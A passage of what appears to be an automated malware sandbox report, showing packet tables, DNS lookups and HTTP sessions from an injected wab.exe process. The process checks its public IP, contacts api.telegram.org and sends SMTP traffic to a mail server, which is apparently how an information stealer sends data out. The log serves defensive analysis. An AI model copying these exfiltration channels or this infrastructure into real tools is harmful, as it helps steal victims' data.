                                              Jul 25, 2024 10:06:12.707060099 CEST49719443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:12.707089901 CEST44349719188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:12.845815897 CEST44349719188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:12.845913887 CEST44349719188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:12.845971107 CEST49719443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:12.846523046 CEST49719443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:12.850303888 CEST4971880192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:12.851268053 CEST4972080192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:12.857387066 CEST8049720193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:12.857458115 CEST4972080192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:12.857552052 CEST4972080192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:12.860860109 CEST8049718193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:12.860914946 CEST4971880192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:12.862706900 CEST8049720193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:13.794564962 CEST8049720193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:13.795883894 CEST49721443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:13.795926094 CEST44349721188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:13.796000004 CEST49721443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:13.796248913 CEST49721443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:13.796261072 CEST44349721188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:13.849507093 CEST4972080192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:14.252198935 CEST44349721188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:14.253918886 CEST49721443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:14.253936052 CEST44349721188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:14.386053085 CEST44349721188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:14.386162043 CEST44349721188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:14.386326075 CEST49721443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:14.387090921 CEST49721443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:14.392362118 CEST4972080192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:14.393933058 CEST4972280192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:14.399768114 CEST8049720193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:14.399857998 CEST4972080192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:14.400953054 CEST8049722193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:14.401026964 CEST4972280192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:14.401153088 CEST4972280192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:14.406531096 CEST8049722193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:17.073066950 CEST8049722193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:17.099203110 CEST4972380192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:17.104125977 CEST8049723193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:17.104223013 CEST4972380192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:17.104306936 CEST4972380192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:17.109283924 CEST8049723193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:17.130675077 CEST4972280192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:19.733266115 CEST8049723193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:19.734102011 CEST4972280192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:19.735603094 CEST49724443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:19.735686064 CEST44349724188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:19.735824108 CEST49724443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:19.736109972 CEST49724443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:19.736129045 CEST44349724188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:19.739500999 CEST8049722193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:19.739589930 CEST4972280192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:19.787163019 CEST4972380192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:20.217608929 CEST44349724188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:20.219362974 CEST49724443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:20.219394922 CEST44349724188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:20.343090057 CEST44349724188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:20.343218088 CEST44349724188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:20.343471050 CEST49724443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:20.343780994 CEST49724443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:20.346962929 CEST4972380192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:20.348258972 CEST4972580192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:20.352453947 CEST8049723193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:20.352531910 CEST4972380192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:20.353033066 CEST8049725193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:20.353104115 CEST4972580192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:20.353204012 CEST4972580192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:20.357994080 CEST8049725193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:23.382668972 CEST8049725193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:23.384078026 CEST49726443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:23.384118080 CEST44349726188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:23.384355068 CEST49726443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:23.384448051 CEST49726443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:23.384464979 CEST44349726188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:23.427577972 CEST4972580192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:23.879322052 CEST44349726188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:23.881793976 CEST49726443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:23.881819963 CEST44349726188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:24.014363050 CEST44349726188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:24.014492989 CEST44349726188.114.96.3192.168.2.8
                                              Jul 25, 2024 10:06:24.014619112 CEST49726443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:24.015167952 CEST49726443192.168.2.8188.114.96.3
                                              Jul 25, 2024 10:06:24.034341097 CEST4972580192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:24.046267986 CEST8049725193.122.6.168192.168.2.8
                                              Jul 25, 2024 10:06:24.046668053 CEST49727443192.168.2.8149.154.167.220
                                              Jul 25, 2024 10:06:24.046688080 CEST4972580192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:24.046756029 CEST44349727149.154.167.220192.168.2.8
                                              Jul 25, 2024 10:06:24.050075054 CEST49727443192.168.2.8149.154.167.220
                                              Jul 25, 2024 10:06:24.050621033 CEST49727443192.168.2.8149.154.167.220
                                              Jul 25, 2024 10:06:24.050652027 CEST44349727149.154.167.220192.168.2.8
                                              Jul 25, 2024 10:06:24.729830980 CEST44349727149.154.167.220192.168.2.8
                                              Jul 25, 2024 10:06:24.729953051 CEST49727443192.168.2.8149.154.167.220
                                              Jul 25, 2024 10:06:24.731921911 CEST49727443192.168.2.8149.154.167.220
                                              Jul 25, 2024 10:06:24.731954098 CEST44349727149.154.167.220192.168.2.8
                                              Jul 25, 2024 10:06:24.732430935 CEST44349727149.154.167.220192.168.2.8
                                              Jul 25, 2024 10:06:24.738327980 CEST49727443192.168.2.8149.154.167.220
                                              Jul 25, 2024 10:06:24.780503035 CEST44349727149.154.167.220192.168.2.8
                                              Jul 25, 2024 10:06:24.998481989 CEST44349727149.154.167.220192.168.2.8
                                              Jul 25, 2024 10:06:24.998558998 CEST44349727149.154.167.220192.168.2.8
                                              Jul 25, 2024 10:06:24.998631954 CEST49727443192.168.2.8149.154.167.220
                                              Jul 25, 2024 10:06:25.007286072 CEST49727443192.168.2.8149.154.167.220
                                              Jul 25, 2024 10:06:30.846798897 CEST4971480192.168.2.8193.122.6.168
                                              Jul 25, 2024 10:06:31.515412092 CEST49728587192.168.2.8192.185.142.133
                                              Jul 25, 2024 10:06:31.520282030 CEST58749728192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:31.520754099 CEST49728587192.168.2.8192.185.142.133
                                              Jul 25, 2024 10:06:32.061460972 CEST58749728192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:32.061825037 CEST49728587192.168.2.8192.185.142.133
                                              Jul 25, 2024 10:06:32.066833019 CEST58749728192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:32.180141926 CEST58749728192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:32.180402040 CEST49728587192.168.2.8192.185.142.133
                                              Jul 25, 2024 10:06:32.185290098 CEST58749728192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:32.299238920 CEST58749728192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:32.299866915 CEST49728587192.168.2.8192.185.142.133
                                              Jul 25, 2024 10:06:32.304783106 CEST58749728192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:32.438194990 CEST58749728192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:32.438303947 CEST58749728192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:32.438322067 CEST58749728192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:32.438390017 CEST49728587192.168.2.8192.185.142.133
                                              Jul 25, 2024 10:06:32.456649065 CEST49728587192.168.2.8192.185.142.133
                                              Jul 25, 2024 10:06:32.463782072 CEST58749728192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:32.579771042 CEST58749728192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:32.583622932 CEST49728587192.168.2.8192.185.142.133
                                              Jul 25, 2024 10:06:32.588675022 CEST58749728192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:32.702629089 CEST58749728192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:32.703121901 CEST49728587192.168.2.8192.185.142.133
                                              Jul 25, 2024 10:06:32.708734035 CEST58749728192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:32.823009014 CEST58749728192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:32.823415041 CEST49728587192.168.2.8192.185.142.133
                                              Jul 25, 2024 10:06:32.828989029 CEST58749728192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:33.061333895 CEST58749728192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:33.061670065 CEST49728587192.168.2.8192.185.142.133
                                              Jul 25, 2024 10:06:33.067259073 CEST58749728192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:33.180284977 CEST58749728192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:33.180633068 CEST49728587192.168.2.8192.185.142.133
                                              Jul 25, 2024 10:06:33.185616970 CEST58749728192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:33.359177113 CEST58749728192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:33.359477997 CEST49728587192.168.2.8192.185.142.133
                                              Jul 25, 2024 10:06:33.364331007 CEST58749728192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:33.477018118 CEST58749728192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:33.479979038 CEST49728587192.168.2.8192.185.142.133
                                              Jul 25, 2024 10:06:33.479979038 CEST49728587192.168.2.8192.185.142.133
                                              Jul 25, 2024 10:06:33.480035067 CEST49728587192.168.2.8192.185.142.133
                                              Jul 25, 2024 10:06:33.480035067 CEST49728587192.168.2.8192.185.142.133
                                              Jul 25, 2024 10:06:33.484807968 CEST58749728192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:33.484869003 CEST58749728192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:33.484898090 CEST58749728192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:33.487011909 CEST58749728192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:33.658339024 CEST58749728192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:33.709018946 CEST49728587192.168.2.8192.185.142.133
                                              Jul 25, 2024 10:06:35.173379898 CEST49728587192.168.2.8192.185.142.133
                                              Jul 25, 2024 10:06:35.178626060 CEST58749728192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:35.291187048 CEST58749728192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:35.291659117 CEST49728587192.168.2.8192.185.142.133
                                              Jul 25, 2024 10:06:35.292722940 CEST49729587192.168.2.8192.185.142.133
                                              Jul 25, 2024 10:06:35.297575951 CEST58749729192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:35.297650099 CEST49729587192.168.2.8192.185.142.133
                                              Jul 25, 2024 10:06:35.852786064 CEST58749729192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:35.852926016 CEST49729587192.168.2.8192.185.142.133
                                              Jul 25, 2024 10:06:35.859675884 CEST58749729192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:35.995678902 CEST58749729192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:35.995861053 CEST49729587192.168.2.8192.185.142.133
                                              Jul 25, 2024 10:06:36.000802040 CEST58749729192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:36.114645958 CEST58749729192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:36.161968946 CEST49729587192.168.2.8192.185.142.133
                                              Jul 25, 2024 10:06:38.447910070 CEST49729587192.168.2.8192.185.142.133
                                              Jul 25, 2024 10:06:38.453664064 CEST58749729192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:38.577277899 CEST58749729192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:38.577305079 CEST58749729192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:38.577361107 CEST49729587192.168.2.8192.185.142.133
                                              Jul 25, 2024 10:06:38.577434063 CEST58749729192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:38.577445984 CEST58749729192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:38.577480078 CEST49729587192.168.2.8192.185.142.133
                                              Jul 25, 2024 10:06:38.578682899 CEST49729587192.168.2.8192.185.142.133
                                              Jul 25, 2024 10:06:38.583623886 CEST58749729192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:38.692044020 CEST58749729192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:38.693525076 CEST49729587192.168.2.8192.185.142.133
                                              Jul 25, 2024 10:06:38.698523045 CEST58749729192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:38.806349993 CEST58749729192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:38.806636095 CEST49729587192.168.2.8192.185.142.133
                                              Jul 25, 2024 10:06:38.812079906 CEST58749729192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:38.919759035 CEST58749729192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:38.920049906 CEST49729587192.168.2.8192.185.142.133
                                              Jul 25, 2024 10:06:38.924931049 CEST58749729192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:39.035254955 CEST58749729192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:39.035578966 CEST49729587192.168.2.8192.185.142.133
                                              Jul 25, 2024 10:06:39.040709019 CEST58749729192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:39.179364920 CEST58749729192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:39.179549932 CEST49729587192.168.2.8192.185.142.133
                                              Jul 25, 2024 10:06:39.187886000 CEST58749729192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:39.356656075 CEST58749729192.185.142.133192.168.2.8
                                              Jul 25, 2024 10:06:39.411967993 CEST49729587192.168.2.8192.185.142.133

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jul 25, 2024 10:05:55.134043932 CEST6182253192.168.2.81.1.1.1
                                              Jul 25, 2024 10:05:55.345859051 CEST53618221.1.1.1192.168.2.8
                                              Jul 25, 2024 10:05:56.745920897 CEST5613853192.168.2.81.1.1.1
                                              Jul 25, 2024 10:05:56.755285025 CEST53561381.1.1.1192.168.2.8
                                              Jul 25, 2024 10:06:00.581677914 CEST5498853192.168.2.81.1.1.1
                                              Jul 25, 2024 10:06:00.590179920 CEST53549881.1.1.1192.168.2.8
                                              Jul 25, 2024 10:06:24.035109997 CEST5865753192.168.2.81.1.1.1
                                              Jul 25, 2024 10:06:24.042309999 CEST53586571.1.1.1192.168.2.8
                                              Jul 25, 2024 10:06:31.098274946 CEST6481953192.168.2.81.1.1.1
                                              Jul 25, 2024 10:06:31.511082888 CEST53648191.1.1.1192.168.2.8

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Jul 25, 2024 10:05:55.134043932 CEST192.168.2.81.1.1.10x9f5Standard query (0)www.reap.skyestates.com.mtA (IP address)IN (0x0001)false
                                              Jul 25, 2024 10:05:56.745920897 CEST192.168.2.81.1.1.10x67feStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                              Jul 25, 2024 10:06:00.581677914 CEST192.168.2.81.1.1.10xcbcaStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                              Jul 25, 2024 10:06:24.035109997 CEST192.168.2.81.1.1.10x647aStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                              Jul 25, 2024 10:06:31.098274946 CEST192.168.2.81.1.1.10x24cdStandard query (0)mail.electromac.com.boA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Jul 25, 2024 10:05:55.345859051 CEST1.1.1.1192.168.2.80x9f5No error (0)www.reap.skyestates.com.mt108.167.181.251A (IP address)IN (0x0001)false
                                              Jul 25, 2024 10:05:56.755285025 CEST1.1.1.1192.168.2.80x67feNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                              Jul 25, 2024 10:05:56.755285025 CEST1.1.1.1192.168.2.80x67feNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                              Jul 25, 2024 10:05:56.755285025 CEST1.1.1.1192.168.2.80x67feNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                              Jul 25, 2024 10:05:56.755285025 CEST1.1.1.1192.168.2.80x67feNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                              Jul 25, 2024 10:05:56.755285025 CEST1.1.1.1192.168.2.80x67feNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                              Jul 25, 2024 10:05:56.755285025 CEST1.1.1.1192.168.2.80x67feNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                              Jul 25, 2024 10:06:00.590179920 CEST1.1.1.1192.168.2.80xcbcaNo error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                              Jul 25, 2024 10:06:00.590179920 CEST1.1.1.1192.168.2.80xcbcaNo error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false
                                              Jul 25, 2024 10:06:24.042309999 CEST1.1.1.1192.168.2.80x647aNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                              Jul 25, 2024 10:06:31.511082888 CEST1.1.1.1192.168.2.80x24cdNo error (0)mail.electromac.com.boelectromac.com.boCNAME (Canonical name)IN (0x0001)false
                                              Jul 25, 2024 10:06:31.511082888 CEST1.1.1.1192.168.2.80x24cdNo error (0)electromac.com.bo192.185.142.133A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • www.reap.skyestates.com.mt
                                              • reallyfreegeoip.org
                                              • api.telegram.org
                                              • checkip.dyndns.org

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.849711193.122.6.168801372C:\Program Files (x86)\Windows Mail\wab.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 25, 2024 10:05:56.773919106 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Jul 25, 2024 10:05:58.761697054 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:05:58 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 1b546ee1cc4e846be48d67f1241c6281
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 25, 2024 10:05:58.765474081 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Jul 25, 2024 10:06:00.152548075 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:06:00 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 3be6f1c5753cb573f775a92bab12a95f
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 25, 2024 10:06:01.381910086 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Jul 25, 2024 10:06:03.976849079 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:06:03 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: 2cc218477ad0c3086a50088c056cd79f
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              1192.168.2.849714193.122.6.168801372C:\Program Files (x86)\Windows Mail\wab.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 25, 2024 10:06:04.619803905 CEST127OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Jul 25, 2024 10:06:05.580435991 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:06:05 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: c78a6676b2fdb80077fb3d0691f11816
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
                                              Jul 25, 2024 10:06:05.635086060 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:06:05 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: c78a6676b2fdb80077fb3d0691f11816
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              2192.168.2.849716193.122.6.168801372C:\Program Files (x86)\Windows Mail\wab.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 25, 2024 10:06:06.267836094 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Jul 25, 2024 10:06:06.897126913 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:06:06 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: ccacc07ff9f7cb8fcb876f6ba40cfa25
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              3192.168.2.849718193.122.6.168801372C:\Program Files (x86)\Windows Mail\wab.exe
                                              TimestampBytes transferredDirectionData
                                              Jul 25, 2024 10:06:07.591886044 CEST151OUTGET / HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                              Host: checkip.dyndns.org
                                              Connection: Keep-Alive
                                              Jul 25, 2024 10:06:12.174505949 CEST320INHTTP/1.1 200 OK
                                              Date: Thu, 25 Jul 2024 08:06:12 GMT
                                              Content-Type: text/html
                                              Content-Length: 103
                                              Connection: keep-alive
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              X-Request-ID: c39645c03b8772f6c9dcbe28522f3246
                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
